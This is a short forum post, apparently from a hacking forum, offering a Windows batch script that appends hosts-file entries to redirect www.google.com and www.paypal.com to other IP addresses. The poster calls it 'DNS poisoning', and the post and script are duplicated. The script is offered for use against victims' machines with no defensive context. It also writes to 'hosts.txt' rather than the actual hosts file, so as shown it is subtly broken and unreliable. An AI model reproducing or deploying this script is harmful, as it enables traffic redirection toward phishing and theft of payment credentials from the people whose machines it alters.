DNS Poisoning with batch 04-25-2014, 12:47 AM
#1
Hey guys,
just a few lines of code to create a batch file that does some serious DNS poisoning.
remember to save as .bat:
@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit
just a few lines of code to create a batch file that does some serious DNS poisoning.
remember to save as .bat:
@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)















![[Image: MUJ8qSW.png]](http://i.imgur.com/MUJ8qSW.png)